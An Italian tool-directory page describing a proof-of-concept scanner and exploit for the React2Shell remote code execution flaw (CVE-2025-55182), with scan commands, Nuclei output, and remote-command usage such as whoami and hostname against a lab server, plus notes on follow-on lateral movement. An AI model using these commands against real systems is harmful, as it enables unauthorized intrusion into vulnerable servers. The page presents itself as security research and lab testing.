Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Shell-PoC-CVE-2025-55182 — Scanner e exploit PoC per la vulnerabilità RCE CVE-2025-55182 (React2Shell) in React Server Components. Rileva server vulnerabili ed esegue comandi remoti per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/litndat/react2shell-poc-cve-2025-55182
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso RemotoLab e Pratica
GitHublitndat/react2shell-poc-cve-2025-55182

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

React2Shell-PoC-CVE-2025-55182

Scanner e exploit PoC per la vulnerabilità RCE CVE-2025-55182 (React2Shell) in React Server Components. Rileva server vulnerabili ed esegue comandi remoti per test di sicurezza autorizzati.

Vedi Repository
43 mesi faNon ancora revisionato
Condividi

Simulazione dello sfruttamento di React2Shell (CVE-2025-55182)

Nota:

  • Questo documento è solo a scopo educativo e di ricerca sulla sicurezza.
  • Non utilizzarlo per attaccare sistemi senza autorizzazione.

1. Panoramica

CVE-2025-55182, nota anche come React2Shell, è una grave vulnerabilità di Remote Code Execution (RCE) che colpisce React Server Components (RSC). Utilizza il protocollo Flight per la comunicazione tra client e server. Quando il client richiede dati, il server riceve un payload, lo analizza e ciò può consentire a un attaccante di iniettare strutture dannose o frammenti di codice arbitrario che React accetta come validi.

ElementoContenuto
GravitàCritical (CVSS 10.0)
TipoUnsafe Deserialization (CWE-502)
Metodo di attaccoRemoto, senza autenticazione richiesta
Versioni interessate:React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 e Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. Causa

Il server elabora il payload dal client senza una validazione completa, consentendo all'attaccante di:

  • Iniettare payload dannosi
  • Eseguire codice sul server
  • Essere sfruttato senza necessità di autenticazione utente, poiché si tratta di una vulnerabilità pre-autenticazione.

L'attività di sfruttamento relativa a questa vulnerabilità è stata rilevata a partire dal 5 dicembre 2025. La maggior parte degli sfruttamenti riusciti ha avuto origine da valutazioni di gruppi di attacco. Sia gli ambienti Windows che Linux sono interessati.

3. Sperimentazione

Installazione

pip install -r requirements.txt

Scansione di un server vulnerabile:

python3 scanner.py -u https://example.com

Inserisci il percorso da scansionare (qui ho inserito la mia macchina vulnerabile http://192.168.10.1:3000)

image

Risultato ottenuto:

image
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

Inoltre, puoi scansionare in base ai tuoi obiettivi di sfruttamento:

Scansione di un elenco di server:

python3 scanner.py -l hosts.txt

Scansione con più thread e salvataggio dei risultati:

python3 scanner.py -l hosts.txt -t 20 -o results.json

Scansione con intestazioni personalizzate:

python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Scansione di target Windows:

python3 scanner.py -u https://example.com --windows

Utilizzo del metodo di rilevamento del canale laterale sicuro:

python3 scanner.py -u https://example.com --safe-check
image

Come puoi vedere, ci troviamo di fronte a una vulnerabilità di sicurezza, il che significa che il server che abbiamo fornito è suscettibile di attacco da parte di un Attaccante.


Nuclei

Ora utilizzeremo Nuclei per verificare quale vulnerabilità sia presente sul server e se abbia un PoC. Questa funzione funziona inviando richieste personalizzate, riducendo i falsi positivi e supportando la scansione parallela.

nuclei -t scan.yaml -u http://192.168.10.1:3000

Risultato ottenuto

[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

Il sistema ha rilevato che questo server è vulnerabile e può essere sfruttato tramite la vulnerabilità CVE-2025-55182. Da qui puoi vedere che si tratta di una vulnerabilità piuttosto pericolosa e importante, con molti PoC disponibili sulle piattaforme social. ☺☺☺

4. Come sfruttare

Puoi vedere che queste informazioni sono sufficienti per confermare l'esistenza della vulnerabilità di sicurezza nell'applicazione. Per dimostrare che questa applicazione può essere utilizzata per eseguire un comando o codice da remoto, inizierò il PoC.

chmod +x scanner.sh

Utilizzo

# Verifica se il target è vulnerabile
./datscan.sh -d example.com

# Esecuzione del comando per controllare l'utente corrente
./datscan.sh -d example.com -c "whoami"

# Con URL completo
./datscan.sh -d example.com -c "uname -a"
image

Significato:

Restituisce l'utente corrente che esegue il processo del server

Aiuta a determinare:

  • Sotto quale utente viene eseguita l'applicazione
  • Il livello di privilegio (basso o amministratore)

=> Questo è il comando più semplice per confermare un RCE riuscito

Nota

  • -d, --domain - dominio/URL
  • -c, --command - Comando da eseguire (es: whoami, hostname,...)

Esempi

# Verifica il nome host
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Determina la versione del sistema operativo
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Verifica che l'esecuzione del comando funzioni stabilmente
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"
Significato dei comandi eseguitiContenuto
Restituisce il nome hostUtilizzato per:
- identificare il sistema interessato
- supportare il lateral movement (in ambienti interni)
Determina la versione del sistema operativoImportante per:
- valutare le possibilità di ulteriore sfruttamento (privilege escalation)
- scegliere l'exploit appropriato
Verifica l'esecuzione del comandoUtilizzato per eseguire il debug del payload/scanner
Restituisce il nome utente correnteIn questo caso:
- l'utente è ADMIN → potrebbe avere privilegi elevati
- Più importante di whoami in alcuni casi Windows
Restituisce il nome hostRestituisce il nome host tramite variabile d'ambiente

IMMAGINE ILLUSTRATIVA DOPO L'ESECUZIONE

image

Questo è il passo di reconnaissance iniziale dopo uno sfruttamento riuscito.

Ci aiuta a confermare: RCE funziona, determinare il sistema operativo,...

ATTENZIONE

Poiché questa sperimentazione è in un ambiente lab personale per evitare implicazioni legali, l'uso di intestazioni HTTP per il furto di dati, output grandi o caratteri speciali può causare:

  • ERR_INVALID_CHAR
  • Risposte ridotte
  • Timeout
image
Scarica lo strumento